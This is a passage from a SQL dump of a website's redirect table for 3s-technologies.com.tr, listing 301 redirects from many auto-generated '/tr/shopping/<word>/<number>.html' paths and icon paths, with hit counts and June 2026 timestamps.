00:00:00',301),(66911,'https://3s-technologies.com.tr/tr/shopping/machismo/2699392084.html',NULL,'https://3s-technologies.com.tr/shopping/machismo/2699392084.html','',1,0,'2026-06-10 22:40:37','0000-00-00 00:00:00',301),(66912,'https://3s-technologies.com.tr/tr/shopping/bassorin/2563936219.html',NULL,'https://3s-technologies.com.tr/shopping/bassorin/2563936219.html','',1,0,'2026-06-10 22:40:42','0000-00-00 00:00:00',301),(66913,'https://3s-technologies.com.tr/tr/shopping/antipyic/1446051112.html',NULL,'https://3s-technologies.com.tr/shopping/antipyic/1446051112.html','',1,0,'2026-06-10 22:40:47','0000-00-00 00:00:00',301),(66914,'https://3s-technologies.com.tr/tr/shopping/homocategoric/70907024.html',NULL,'https://3s-technologies.com.tr/shopping/homocategoric/70907024.html','',1,0,'2026-06-10 22:40:52','0000-00-00 00:00:00',301),(66915,'https://3s-technologies.com.tr/tr/shopping/burglaries/1195543295.html',NULL,'https://3s-technologies.com.tr/shopping/burglaries/1195543295.html','',1,0,'2026-06-10 22:40:57','0000-00-00 00:00:00',301),(66916,'https://3s-technologies.com.tr/tr/shopping/horologer/1120912564.html',NULL,'https://3s-technologies.com.tr/shopping/horologer/1120912564.html','',1,0,'2026-06-10 22:41:02','0000-00-00 00:00:00',301),(66917,'https://3s-technologies.com.tr/tr/shopping/archiepiscopacy/2158526506.html',NULL,'https://3s-technologies.com.tr/shopping/archiepiscopacy/2158526506.html','',1,0,'2026-06-10 22:41:09','0000-00-00 00:00:00',301),(66918,'https://3s-technologies.com.tr/tr/shopping/tetrahedrally/2315411141.html',NULL,'https://3s-technologies.com.tr/shopping/tetrahedrally/2315411141.html','',1,0,'2026-06-10 22:41:13','0000-00-00 00:00:00',301),(66919,'https://3s-technologies.com.tr/tr/shopping/nationalism/1015806661.html',NULL,'https://3s-technologies.com.tr/shopping/nationalism/1015806661.html','',1,0,'2026-06-10 22:41:18','0000-00-00 00:00:00',301),(66920,'https://3s-technologies.com.tr/tr/shopping/anxietude/1225223172.html',NULL,'https://3s-technologies.com.tr/shopping/anxietude/1225223172.html','',1,0,'2026-06-10 22:41:23','0000-00-00 00:00:00',301),(66921,'https://3s-technologies.com.tr/tr/shopping/recomfort/1425155846.html',NULL,'https://3s-technologies.com.tr/shopping/recomfort/1425155846.html','',1,0,'2026-06-10 22:41:29','0000-00-00 00:00:00',301),(66922,'https://3s-technologies.com.tr/tr/shopping/sclerotia/4028600510.html',NULL,'https://3s-technologies.com.tr/shopping/sclerotia/4028600510.html','',1,0,'2026-06-10 22:41:33','0000-00-00 00:00:00',301),(66923,'https://3s-technologies.com.tr/tr/shopping/heterology/1328974254.html',NULL,'https://3s-technologies.com.tr/shopping/heterology/1328974254.html','',1,0,'2026-06-10 22:41:38','0000-00-00 00:00:00',301),(66924,'https://3s-technologies.com.tr/tr/shopping/villanel/4066243681.html',NULL,'https://3s-technologies.com.tr/shopping/villanel/4066243681.html','',1,0,'2026-06-10 22:41:45','0000-00-00 00:00:00',301),(66925,'https://3s-technologies.com.tr/tr/shopping/lagophthalmos/1546821508.html',NULL,'https://3s-technologies.com.tr/shopping/lagophthalmos/1546821508.html','',1,0,'2026-06-10 22:41:49','0000-00-00 00:00:00',301),(66926,'https://3s-technologies.com.tr/tr/shopping/urohaematin/1958844915.html',NULL,'https://3s-technologies.com.tr/shopping/urohaematin/1958844915.html','',1,0,'2026-06-10 22:41:54','0000-00-00 00:00:00',301),(66927,'https://3s-technologies.com.tr/tr/shopping/blackberrylily/1058038636.html',NULL,'https://3s-technologies.com.tr/shopping/blackberrylily/1058038636.html','',1,0,'2026-06-10 22:41:59','0000-00-00 00:00:00',301),(66928,'https://3s-technologies.com.tr/tr/shopping/upeygan/1181219572.html',NULL,'https://3s-technologies.com.tr/shopping/upeygan/1181219572.html','',1,0,'2026-06-10 22:42:04','0000-00-00 00:00:00',301),(66929,'https://3s-technologies.com.tr/tr/shopping/irrevealably/3128121261.html',NULL,'https://3s-technologies.com.tr/shopping/irrevealably/3128121261.html','',1,0,'2026-06-10 22:42:09','0000-00-00 00:00:00',301),(66930,'https://3s-technologies.com.tr/tr/shopping/pachyrhizus/2568525007.html',NULL,'https://3s-technologies.com.tr/shopping/pachyrhizus/2568525007.html','',1,0,'2026-06-10 22:42:14','0000-00-00 00:00:00',301),(66931,'https://3s-technologies.com.tr/tr/shopping/radiotelegraphic/1247330537.html',NULL,'https://3s-technologies.com.tr/shopping/radiotelegraphic/1247330537.html','',1,0,'2026-06-10 22:42:23','0000-00-00 00:00:00',301),(66932,'https://3s-technologies.com.tr/tr/shopping/taliacotian/3711332412.html',NULL,'https://3s-technologies.com.tr/shopping/taliacotian/3711332412.html','',1,0,'2026-06-10 22:42:28','0000-00-00 00:00:00',301),(66933,'https://3s-technologies.com.tr/tr/shopping/anthropotomist/4103231209.html',NULL,'https://3s-technologies.com.tr/shopping/anthropotomist/4103231209.html','',1,0,'2026-06-10 22:42:33','0000-00-00 00:00:00',301),(66934,'http://3s-technologies.com.tr/en/mstile-310x310.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:33','0000-00-00 00:00:00',301),(66935,'http://3s-technologies.com.tr/en/mstile-150x150.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:34','0000-00-00 00:00:00',301),(66936,'http://3s-technologies.com.tr/en/mstile-144x144.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:35','0000-00-00 00:00:00',301),(66937,'http://3s-technologies.com.tr/en/mstile-70x70.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:36','0000-00-00 00:00:00',301),(66938,'https://3s-technologies.com.tr/tr/shopping/photophore/1041454254.html',NULL,'https://3s-technologies.com.tr/shopping/photophore/1041454254.html','',1,0,'2026-06-10 22:42:38','0000-00-00 00:00:00',301),(66939,'http://3s-technologies.com.tr/en/apple-touch-icon-180x180.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:38','0000-00-00 00:00:00',301),(66940,'http://3s-technologies.com.tr/en/apple-touch-icon-152x152.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:39','0000-00-00 00:00:00',301),(66941,'http://3s-technologies.com.tr/en/apple-touch-icon-144x144.png',NULL,'http://3s-technologies.com.tr/en/','',2,0,'2026-06-10 22:42:40','0000-00-00 00:00:00',301),(66942,'http://3s-technologies.com.tr/en/apple-touch-icon-120x120.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:41','0000-00-00 00:00:00',301),(66943,'http://3s-technologies.com.tr/en/apple-touch-icon-76x76.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:42','0000-00-00 00:00:00',301),(66944,'https://3s-technologies.com.tr/tr/shopping/aquifoliaceae/2266048097.html',NULL,'https://3s-technologies.com.tr/shopping/aquifoliaceae/2266048097.html','',1,0,'2026-06-10 22:42:43','0000-00-00 00:00:00',301),(66945,'http://3s-technologies.com.tr/en/apple-touch-icon-72x72.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:43','0000-00-00 00:00:00',301),(66946,'http://3s-technologies.com.tr/en/apple-touch-icon-60x60.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:44','0000-00-00 00:00:00',301),(66947,'http://3s-technologies.com.tr/en/apple-touch-icon-57x57.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:45','0000-00-00 00:00:00',301),(66948,'http://3s-technologies.com.tr/en/favicon-32x32.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:46','0000-00-00 00:00:00',301),(66949,'http://3s-technologies.com.tr/en/favicon-16x16.png',NULL,'http://3s-technologies.com.tr/en/','',1,0,'2026-06-10 22:42:47','0000-00-00 00:00:00',301),(66950,'https://3s-technologies.com.tr/tr/shopping/hegelianism/1105981724.html',NULL,'https://3s-technologies.com.tr/shopping/hegelianism/1105981724.html','',1,0,'2026-06-10 22:42:48','0000-00-00 00:00:00',301),(66951,'https://3s-technologies.com.tr/tr/shopping/bloodstock/4264964256.html',NULL,'https://3s-technologies.com.tr/shopping/bloodstock/4264964256.html','',1,0,'2026-06-10 22:42:57','0000-00-00 00:00:00',301),(66952,'https://3s-technologies.com.tr/tr/shopping/unpeople/3266674496.html',NULL,'https://3s-technologies.com.tr/shopping/unpeople/3266674496.html','',1,0,'2026-06-10 22:43:00','0000-00-00 00:00:00',301),(66953,'https://3s-technologies.com.tr/tr/shopping/sykesii/1479107710.html',NULL,'https://3s-technologies.com.tr/shopping/sykesii/1479107710.html','',1,0,'2026-06-10 22:43:15','0000-00-00 00:00:00',301),(66954,'https://3s-technologies.com.tr/tr/shopping/amphibiotica/3927830114.html',NULL,'https://3s-technologies.com.tr/shopping/amphibiotica/3927830114.html','',1,0,'2026-06-10 22:43:19','0000-00-00 00:00:00',301),(66955,'https://3s-technologies.com.tr/tr/shopping/habergeon/3812128862.html',NULL,'https://3s-technologies.com.tr/shopping/habergeon/3812128862.html','',1,0,'2026-06-10 22:43:24','0000-00-00 00:00:00',301),(66956,'https://3s-technologies.com.tr/tr/shopping/raptatores/2319047454.html',NULL,'https://3s-technologies.com.tr/shopping/raptatores/2319047454.html','',1,0,'2026-06-10 22:43:29','0000-00-00 00:00:00',301),(66957,'https://3s-technologies.com.tr/tr/shopping/emulatress/467582755.html',NULL,'https://3s-technologies.com.tr/shopping/emulatress/467582755.html','',1,0,'2026-06-10 22:43:34','0000-00-00 00:00:00',301),(66958,'https://3s-technologies.com.tr/tr/shopping/twelvemens/425350812.html',NULL,'https://3s-technologies.com.tr/shopping/twelvemens/425350812.html','',1,0,'2026-06-10 22:43:39','0000-00-00 00:00:00',301),(66959,'https://3s-technologies.com.tr/tr/shopping/sexisyllabic/2224864698.html',NULL,'https://3s-technologies.com.tr/shopping/sexisyllabic/2224864698.html','',1,0,'2026-06-10 22:43:48','0000-00-00 00:00:00',301),(66960,'https://3s-technologies.com.tr/tr/shopping/antimonarchist/2414851339.html',NULL,'https://3s-technologies.com.tr/shopping/antimonarchist/2414851339.html','',1,0,'2026-06-10 22:43:53','0000-00-00 00:00:00',301),(66961,'https://3s-technologies.com.tr/tr/shopping/hysteroepilepsy/179413471.html',NULL,'https://3s-technologies.com.tr/shopping/hysteroepilepsy/179413471.html','',1,0,'2026-06-10 22:43:58','0000-00-00 00:00:00',301),(66962,'https://3s-technologies.com.tr/tr/shopping/plymouthists/3000491173.html',NULL,'https://3s-technologies.com.tr/shopping/plymouthists/3000491173.html','',1,0,'2026-06-10 22:44:03','0000-00-00 00:00:00',301),(66963,'https://3s-technologies.com.tr/tr/shopping/antiparallels/1206096493.html',NULL,'https://3s-technologies.com.tr/shopping/antiparallels/1206096493.html','',1,0,'2026-06-10 22:44:08','0000-00-00 00:00:00',301),(66964,'https://3s-technologies.com.tr/tr/shopping/basswood/871246881.html',NULL,'https://3s-technologies.com.tr/shopping/basswood/871246881.html','',1,0,'2026-06-10 22:44:13','0000-00-00 00:00:00',301),(66965,'https://3s-technologies.com.tr/tr/shopping/courtmartial/3261922169.html',NULL,'https://3s-technologies.com.tr/shopping/courtmartial/3261922169.html','',1,0,'2026-06-10 22:44:22','0000-00-00 00:00:00',301),(66966,'https://3s-technologies.com.tr/tr/shopping/cosmogonist/2152562112.html',NULL,'https://3s-technologies.com.tr/shopping/cosmogonist/2152562112.html','',1,0,'2026-06-10 22:44:26','0000-00-00 00:00:00',301),(66967,'https://3s-technologies.com.tr/tr/shopping/bassoonist/3751140173.html',NULL,'https://3s-technologies.com.tr/shopping/bassoonist/3751140173.html','',1,0,'2026-06-10 22:44:31','0000-00-00 00:00:00',301),(66968,'https://3s-technologies.com.tr/tr/shopping/houyhnhnm/1233352188.html',NULL,'https://3s-technologies.com.tr/shopping/houyhnhnm/1233352188.html','',1,0,'2026-06-10 22:44:36','0000-00-00 00:00:00',301),(66969,'https://3s-technologies.com.tr/tr/shopping/crateropodidae/3944578003.html',NULL,'https://3s-technologies.com.tr/shopping/crateropodidae/3944578003.html','',1,0,'2026-06-10 22:44:41','0000-00-00 00:00:00',301),(66970,'https://3s-technologies.com.tr/tr/shopping/tubipora/1136218073.html',NULL,'https://3s-technologies.com.tr/shopping/tubipora/1136218073.html','',1,0,'2026-06-10 22:44:46','0000-00-00 00:00:00',301),(66971,'https://3s-technologies.com.tr/tr/shopping/montia/1794160541.html',NULL,'https://3s-technologies.com.tr/shopping/montia/1794160541.html','',1,0,'2026-06-10 22:44:52','0000-00-00 00:00:00',301),(66972,'https://3s-technologies.com.tr/tr/shopping/annulosa/1767300865.html',NULL,'https://3s-technologies.com.tr/shopping/annulosa/1767300865.html','',1,0,'2026-06-10 22:44:56','0000-00-00 00:00:00',301),(66973,'https://3s-technologies.com.tr/tr/shopping/goujere/1619546183.html',NULL,'https://3s-technologies.com.tr/shopping/goujere/1619546183.html','',1,0,'2026-06-10 22:45:01','0000-00-00 00:00:00',301),(66974,'https://3s-technologies.com.tr/tr/shopping/tetesdepont/1022983186.html',NULL,'https://3s-technologies.com.tr/shopping/tetesdepont/1022983186.html','',1,0,'2026-06-10 22:45:06','0000-00-00 00:00:00',301),(66975,'https://3s-technologies.com.tr/tr/shopping/quixotism/380135097.html',NULL,'https://3s-technologies.com.tr/shopping/quixotism/380135097.html','',1,0,'2026-06-10 22:45:11','0000-00-00 00:00:00',301),(66976,'https://3s-technologies.com.tr/tr/shopping/watchhouses/3218124243.html',NULL,'https://3s-technologies.com.tr/shopping/watchhouses/3218124243.html','',1,0,'2026-06-10 22:45:16','0000-00-00 00:00:00',301),(66977,'https://3s-technologies.com.tr/tr/shopping/finetoothedadj/4206985361.html',NULL,'https://3s-technologies.com.tr/shopping/finetoothedadj/4206985361.html','',1,0,'2026-06-10 22:45:22','0000-00-00 00:00:00',301),(66978,'https://3s-technologies.com.tr/tr/shopping/anguiform/3370108758.html',NULL,'https://3s-technologies.com.tr/shopping/anguiform/3370108758.html','',1,0,'2026-06-10 22:45:28','0000-00-00 00:00:00',301),(66979,'https://3s-technologies.com.tr/tr/shopping/topically/2462453000.html',NULL,'https://3s-technologies.com.tr/shopping/topically/2462453000.html','',1,0,'2026-06-10 22:45:33','0000-00-00 00:00:00',301),(66980,'https://3s-technologies.com.tr/tr/shopping/congiary/2200209197.html',NULL,'https://3s-technologies.com.tr/shopping/congiary/2200209197.html','',1,0,'2026-06-10 22:45:38','0000-00-00 00:00:00',301),(66981,'https://3s-technologies.com.tr/tr/shopping/tipcat/527176972.html',NULL,'https://3s-technologies.com.tr/shopping/tipcat/527176972.html','',1,0,'2026-06-10 22:45:43','0000-00-00 00:00:00',301),(66982,'https://3s-technologies.com.tr/tr/shopping/coilon/4033852113.html',NULL,'https://3s-technologies.com.tr/shopping/coilon/4033852113.html','',1,0,'2026-06-10 22:45:48','0000-00-00 00:00:00',301),(66983,'https://3s-technologies.com.tr/tr/shopping/surrounding/4005384319.html',NULL,'https://3s-technologies.com.tr/shopping/surrounding/4005384319.html','',1,0,'2026-06-10 22:45:53','0000-00-00 00:00:00',301),(66984,'https://3s-technologies.com.tr/tr/shopping/prosimetrical/4196701142.html',NULL,'https://3s-technologies.com.tr/shopping/prosimetrical/4196701142.html','',1,0,'2026-06-10 22:45:58','0000-00-00 00:00:00',301),(66985,'https://3s-technologies.com.tr/tr/shopping/domable/2009705182.html',NULL,'https://3s-technologies.com.tr/shopping/domable/2009705182.html','',1,0,'2026-06-10 22:46:03','0000-00-00 00:00:00',301),(66986,'https://3s-technologies.com.tr/tr/shopping/bepaint/2881652916.html',NULL,'https://3s-technologies.com.tr/shopping/bepaint/2881652916.html','',1,0,'2026-06-10 22:46:08','0000-00-00 00:00:00',301),(66987,'https://3s-technologies.com.tr/tr/shopping/hellenic/3056545162.html',NULL,'https://3s-technologies.com.tr/shopping/hellenic/3056545162.html','',1,0,'2026-06-10 22:46:13','0000-00-00 00:00:00',301),(66988,'https://3s-technologies.com.tr/tr/shopping/modal/2856776027.html',NULL,'https://3s-technologies.com.tr/shopping/modal/2856776027.html','',1,0,'2026-06-10 22:46:21','0000-00-00 00:00:00',301),(66989,'https://3s-technologies.com.tr/tr/shopping/chainwork/1128492280.html',NULL,'https://3s-technologies.com.tr/shopping/chainwork/1128492280.html','',1,0,'2026-06-10 22:46:25','0000-00-00 00:00:00',301),(66990,'https://3s-technologies.com.tr/tr/shopping/farced/2298555379.html',NULL,'https://3s-technologies.com.tr/shopping/farced/2298555379.html','',1,0,'2026-06-10 22:46:30','0000-00-00 00:00:00',301),(66991,'https://3s-technologies.com.tr/tr/shopping/refragability/2039385059.html',NULL,'https://3s-technologies.com.tr/shopping/refragability/2039385059.html','',1,0,'2026-06-10 22:46:35','0000-00-00 00:00:00',301),(66992,'https://3s-technologies.com.tr/tr/shopping/slewth/1968685306.html',NULL,'https://3s-technologies.com.tr/shopping/slewth/1968685306.html','',1,0,'2026-06-10 22:46:40','0000-00-00 00:00:00',301),(66993,'https://3s-technologies.com.tr/tr/shopping/scoffingly/4266416023.html',NULL,'https://3s-technologies.com.tr/shopping/scoffingly/4266416023.html','',1,0,'2026-06-10 22:46:45','0000-00-00 00:00:00',301),(66994,'https://3s-technologies.com.tr/tr/shopping/masterlessness/1870339108.html',NULL,'https://3s-technologies.com.tr/shopping/masterlessness/1870339108.html','',1,0,'2026-06-10 22:46:50','0000-00-00 00:00:00',301),(66995,'https://3s-technologies.com.tr/tr/shopping/stooking/652079639.html',NULL,'https://3s-technologies.com.tr/shopping/stooking/652079639.html','',1,0,'2026-06-10 22:46:55','0000-00-00 00:00:00',301),(66996,'https://3s-technologies.com.tr/tr/shopping/demanded/3341640964.html',NULL,'https://3s-technologies.com.tr/shopping/demanded/3341640964.html','',1,0,'2026-06-10 22:47:00','0000-00-00 00:00:00',301),(66997,'https://3s-technologies.com.tr/tr/shopping/dunce/449073483.html',NULL,'https://3s-technologies.com.tr/shopping/dunce/449073483.html','',1,0,'2026-06-10 22:47:05','0000-00-00 00:00:00',301),(66998,'https://3s-technologies.com.tr/tr/shopping/conceded/1286029488.html',NULL,'https://3s-technologies.com.tr/shopping/conceded/1286029488.html','',1,0,'2026-06-10 22:47:11','0000-00-00 00:00:00',301),(66999,'https://3s-technologies.com.tr/tr/shopping/euosmitte/215524685.html',NULL,'https://3s-technologies.com.tr/shopping/euosmitte/215524685.html','',1,0,'2026-06-10 22:47:16','0000-00-00 00:00:00',301),(67000,'https://3s-technologies.com.tr/tr/shopping/intercidence/378210207.html',NULL,'https://3s-technologies.com.tr/shopping/intercidence/378210207.html','',1,0,'2026-06-10 22:47:21','0000-00-00 00:00:00',301),(67001,'https://3s-technologies.com.tr/tr/shopping/glomerule/3411292157.html',NULL,'https://3s-technologies.com.tr/shopping/glomerule/3411292157.html','',1,0,'2026-06-10 22:47:26','0000-00-00 00:00:00',301),(67002,'https://3s-technologies.com.tr/tr/shopping/leptothrix/3952157719.html',NULL,'https://3s-technologies.com.tr/shopping/leptothrix/3952157719.html','',1,0,'2026-06-10 22:47:31','0000-00-00 00:00:00',301),(67003,'https://3s-technologies.com.tr/tr/shopping/impatiency/3725550461.html',NULL,'https://3s-technologies.com.tr/shopping/impatiency/3725550461.html','',1,0,'2026-06-10 22:47:36','0000-00-00 00:00:00',301),(67004,'https://3s-technologies.com.tr/tr/shopping/incommodity/2661010052.html',NULL,'https://3s-technologies.com.tr/shopping/incommodity/2661010052.html','',1,0,'2026-06-10 22:47:41','0000-00-00 00:00:00',301),(67005,'https://3s-technologies.com.tr/tr/shopping/growable/3883718657.html',NULL,'https://3s-technologies.com.tr/shopping/growable/3883718657.html','',1,0,'2026-06-10 22:47:46','0000-00-00 00:00:00',301),(67006,'https://3s-technologies.com.tr/tr/shopping/imprecating/4197913241.html',NULL,'https://3s-technologies.com.tr/shopping/imprecating/4197913241.html','',1,0,'2026-06-10 22:47:51','0000-00-00 00:00:00',301),(67007,'https://3s-technologies.com.tr/tr/shopping/japer/3489395646.html',NULL,'https://3s-technologies.com.tr/shopping/japer/3489395646.html','',1,0,'2026-06-10 22:47:56','0000-00-00 00:00:00',301),(67008,'https://3s-technologies.com.tr/tr/shopping/replier/799834321.html',NULL,'https://3s-technologies.com.tr/shopping/replier/799834321.html','',1,0,'2026-06-10 22:48:01','0000-00-00 00:00:00',301),(67009,'https://3s-technologies.com.tr/tr/shopping/analyzing/949967777.html',NULL,'https://3s-technologies.com.tr/shopping/analyzing/949967777.html','',1,0,'2026-06-10 22:48:06','0000-00-00 00:00:00',301),(67010,'https://3s-technologies.com.tr/tr/shopping/demagogue/3247230997.html',NULL,'https://3s-technologies.com.tr/shopping/demagogue/3247230997.html','',1,0,'2026-06-10 22:48:12','0000-00-00 00:00:00',301),(67011,'https://3s-technologies.com.tr/tr/shopping/tunnelled/1680352483.html',NULL,'https://3s-technologies.com.tr/shopping/tunnelled/1680352483.html','',1,0,'2026-06-10 22:48:16','0000-00-00 00:00:00',301),(67012,'https://3s-technologies.com.tr/tr/shopping/redbacked/868273383.html',NULL,'https://3s-technologies.com.tr/shopping/redbacked/868273383.html','',1,0,'2026-06-10 22:48:21','0000-00-00 00:00:00',301),(67013,'https://3s-technologies.com.tr/tr/shopping/chachacha/2610207682.html',NULL,'https://3s-technologies.com.tr/shopping/chachacha/2610207682.html','',1,0,'2026-06-10 22:48:26','0000-00-00 00:00:00',301),(67014,'https://3s-technologies.com.tr/tr/shopping/mooress/4075035480.html',NULL,'https://3s-technologies.com.tr/shopping/mooress/4075035480.html','',1,0,'2026-06-10 22:48:31','0000-00-00 00:00:00',301),(67015,'https://3s-technologies.com.tr/tr/shopping/sedile/164558760.html',NULL,'https://3s-technologies.com.tr/shopping/sedile/164558760.html','',1,0,'2026-06-10 22:48:36','0000-00-00 00:00:00',301),(67016,'https://3s-technologies.com.tr/tr/shopping/coagulating/1777141240.html',NULL,'https://3s-technologies.com.tr/shopping/coagulating/1777141240.html','',1,0,'2026-06-10 22:48:41','0000-00-00 00:00:00',301),(67017,'https://3s-technologies.com.tr/tr/shopping/introsusception/110001962.html',NULL,'https://3s-technologies.com.tr/shopping/introsusception/110001962.html','',1,0,'2026-06-10 22:48:46','0000-00-00 00:00:00',301),(67018,'https://3s-technologies.com.tr/tr/shopping/discost/1449927093.html',NULL,'https://3s-technologies.com.tr/shopping/discost/1449927093.html','',1,0,'2026-06-10 22:48:51','0000-00-00 00:00:00',301),(67019,'https://3s-technologies.com.tr/tr/shopping/cryptographal/3270714000.html',NULL,'https://3s-technologies.com.tr/shopping/cryptographal/3270714000.html','',1,0,'2026-06-10 22:48:56','0000-00-00 00:00:00',301),(67020,'https://3s-technologies.com.tr/tr/shopping/enothera/1751215775.html',NULL,'https://3s-technologies.com.tr/shopping/enothera/1751215775.html','',1,0,'2026-06-10 22:49:01','0000-00-00 00:00:00',301),(67021,'https://3s-technologies.com.tr/tr/shopping/yeaning/650867540.html',NULL,'https://3s-technologies.com.tr/shopping/yeaning/650867540.html','',1,0,'2026-06-10 22:49:08','0000-00-00 00:00:00',301),(67022,'https://3s-technologies.com.tr/tr/shopping/dryclean/2132582943.html',NULL,'https://3s-technologies.com.tr/shopping/dryclean/2132582943.html','',1,0,'2026-06-10 22:49:12','0000-00-00 00:00:00',301),(67023,'https://3s-technologies.com.tr/tr/shopping/typhos/2091563083.html',NULL,'https://3s-technologies.com.tr/shopping/typhos/2091563083.html','',1,0,'2026-06-10 22:49:17','0000-00-00 00:00:00',301),(67024,'https://3s-technologies.com.tr/tr/shopping/confessor/2769769780.html',NULL,'https://3s-technologies.com.tr/shopping/confessor/2769769780.html','',1,0,'2026-06-10 22:49:22','0000-00-00 00:00:00',301),(67025,'https://3s-technologies.com.tr/tr/shopping/driftway/309707425.html',NULL,'https://3s-technologies.com.tr/shopping/driftway/309707425.html','',1,0,'2026-06-10 22:49:31','0000-00-00 00:00:00',301),(67026,'https://3s-technologies.com.tr/tr/shopping/speaker/1478558410.html',NULL,'https://3s-technologies.com.tr/shopping/speaker/1478558410.html','',1,0,'2026-06-10 22:49:35','0000-00-00 00:00:00',301),(67027,'https://3s-technologies.com.tr/tr/shopping/colpoon/3532957819.html',NULL,'https://3s-technologies.com.tr/shopping/colpoon/3532957819.html','',1,0,'2026-06-10 22:49:40','0000-00-00 00:00:00',301),(67028,'https://3s-technologies.com.tr/tr/shopping/trimera/286224422.html',NULL,'https://3s-technologies.com.tr/shopping/trimera/286224422.html','',1,0,'2026-06-10 22:49:45','0000-00-00 00:00:00',301),(67029,'https://3s-technologies.com.tr/tr/shopping/entrochal/1205383670.html',NULL,'https://3s-technologies.com.tr/shopping/entrochal/1205383670.html','',1,0,'2026-06-10 22:49:51','0000-00-00 00:00:00',301),(67030,'https://3s-technologies.com.tr/tr/shopping/omniformity/238844133.html',NULL,'https://3s-technologies.com.tr/shopping/omniformity/238844133.html','',1,0,'2026-06-10 22:49:55','0000-00-00 00:00:00',301),(67031,'https://3s-technologies.com.tr/tr/shopping/adulter/2933667401.html',NULL,'https://3s-technologies.com.tr/shopping/adulter/2933667401.html','',1,0,'2026-06-10 22:50:01','0000-00-00 00:00:00',301),(67032,'https://3s-technologies.com.tr/tr/shopping/irenical/3763383193.html',NULL,'https://3s-technologies.com.tr/shopping/irenical/3763383193.html','',1,0,'2026-06-10 22:50:05','0000-00-00 00:00:00',301),(67033,'https://3s-technologies.com.tr/tr/shopping/prolifical/3126196339.html',NULL,'https://3s-technologies.com.tr/shopping/prolifical/3126196339.html','',1,0,'2026-06-10 22:50:10','0000-00-00 00:00:00',301),(67034,'https://3s-technologies.com.tr/tr/shopping/frizzed/680547433.html',NULL,'https://3s-technologies.com.tr/shopping/frizzed/680547433.html','',1,0,'2026-06-10 22:50:15','0000-00-00 00:00:00',301),(67035,'https://3s-technologies.com.tr/tr/shopping/commemorable/1058279890.html',NULL,'https://3s-technologies.com.tr/shopping/commemorable/1058279890.html','',1,0,'2026-06-10 22:50:23','0000-00-00 00:00:00',301),(67036,'https://3s-technologies.com.tr/tr/shopping/dogtie/3353214997.html',NULL,'https://3s-technologies.com.tr/shopping/dogtie/3353214997.html','',1,0,'2026-06-10 22:50:27','0000-00-00 00:00:00',301),(67037,'https://3s-technologies.com.tr/tr/shopping/dwaul/3577026677.html',NULL,'https://3s-technologies.com.tr/shopping/dwaul/3577026677.html','',1,0,'2026-06-10 22:50:32','0000-00-00 00:00:00',301),(67038,'https://3s-technologies.com.tr/tr/shopping/bruised/1099046453.html',NULL,'https://3s-technologies.com.tr/shopping/bruised/1099046453.html','',1,0,'2026-06-10 22:50:37','0000-00-00 00:00:00',301),(67039,'https://3s-technologies.com.tr/tr/shopping/pieris/1110791900.html',NULL,'https://3s-technologies.com.tr/shopping/pieris/1110791900.html','',1,0,'2026-06-10 22:50:42','0000-00-00 00:00:00',301),(67040,'https://3s-technologies.com.tr/tr/shopping/cultured/145809804.html',NULL,'https://3s-technologies.com.tr/shopping/cultured/145809804.html','',1,0,'2026-06-10 22:50:47','0000-00-00 00:00:00',301),(67041,'https://3s-technologies.com.tr/tr/shopping/nonhereditary/566058280.html',NULL,'https://3s-technologies.com.tr/shopping/nonhereditary/566058280.html','',1,0,'2026-06-10 22:50:52','0000-00-00 00:00:00',301),(67042,'https://3s-technologies.com.tr/tr/shopping/recche/716816552.html',NULL,'https://3s-technologies.com.tr/shopping/recche/716816552.html','',1,0,'2026-06-10 22:50:57','0000-00-00 00:00:00',301),(67043,'https://3s-technologies.com.tr/tr/shopping/metropolis/2599329008.html',NULL,'https://3s-technologies.com.tr/shopping/metropolis/2599329008.html','',1,0,'2026-06-10 22:51:03','0000-00-00 00:00:00',301),(67044,'https://3s-technologies.com.tr/tr/shopping/oracled/1587919115.html',NULL,'https://3s-technologies.com.tr/shopping/oracled/1587919115.html','',1,0,'2026-06-10 22:51:07','0000-00-00 00:00:00',301),(67045,'https://3s-technologies.com.tr/tr/shopping/tough/3370272281.html',NULL,'https://3s-technologies.com.tr/shopping/tough/3370272281.html','',1,0,'2026-06-10 22:51:17','0000-00-00 00:00:00',301),(67046,'https://3s-technologies.com.tr/tr/shopping/grouper/3561652824.html',NULL,'https://3s-technologies.com.tr/shopping/grouper/3561652824.html','',1,0,'2026-06-10 22:51:21','0000-00-00 00:00:00',301),(67047,'https://3s-technologies.com.tr/tr/shopping/dionysius/2447358637.html',NULL,'https://3s-technologies.com.tr/shopping/dionysius/2447358637.html','',1,0,'2026-06-10 22:51:26','0000-00-00 00:00:00',301),(67048,'https://3s-technologies.com.tr/tr/shopping/emailed/25192718.html',NULL,'https://3s-technologies.com.tr/shopping/emailed/25192718.html','',1,0,'2026-06-10 22:51:31','0000-00-00 00:00:00',301),(67049,'https://3s-technologies.com.tr/tr/shopping/rivery/1304941983.html',NULL,'https://3s-technologies.com.tr/shopping/rivery/1304941983.html','',1,0,'2026-06-10 22:51:36','0000-00-00 00:00:00',301),(67050,'https://3s-technologies.com.tr/tr/shopping/superinduce/1941202400.html',NULL,'https://3s-technologies.com.tr/shopping/superinduce/1941202400.html','',1,0,'2026-06-10 22:51:41','0000-00-00 00:00:00',301),(67051,'https://3s-technologies.com.tr/tr/shopping/valetudinary/1574362295.html',NULL,'https://3s-technologies.com.tr/shopping/valetudinary/1574362295.html','',1,0,'2026-06-10 22:51:44','0000-00-00 00:00:00',301),(67052,'https://3s-technologies.com.tr/tr/shopping/recapitulatory/2227692103.html',NULL,'https://3s-technologies.com.tr/shopping/recapitulatory/2227692103.html','',1,0,'2026-06-10 22:51:48','0000-00-00 